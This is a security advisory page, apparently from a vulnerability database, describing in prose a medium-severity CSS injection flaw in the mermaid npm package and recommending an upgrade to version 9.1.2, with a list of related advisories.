Possible inject arbitrary `CSS` into the generated graph affecting the container HTML
- Severity:
- Medium
Description
An attacker is able to inject arbitrary CSS into the generated graph allowing them to change the styling of elements outside of the generated graph, and potentially exfiltrate sensitive information by using specially crafted CSS selectors.
Recommendation
Update the mermaid package to the latest compatible version. Followings are version details:
- Affected version(s): >= 8.0.0, < 9.1.2
- Patched version(s): 9.1.2
References
Related Issues
- Astro allows unauthorized third-party images in _image endpoint (GHSA-xf8x-j4p2-f749) - CVE-2025-55303
- jsondiffpatch is vulnerable to Cross-site Scripting (XSS) via HtmlFormatter::nodeBegin - CVE-2025-9910
- Vite middleware may serve files starting with the same name with the public directory - CVE-2025-58751
- Mermaid improperly sanitizes sequence diagram labels leading to XSS - CVE-2025-54881
- Tags:
- npm
- mermaid
Anything's wrong? Let us know Last updated on July 21, 2023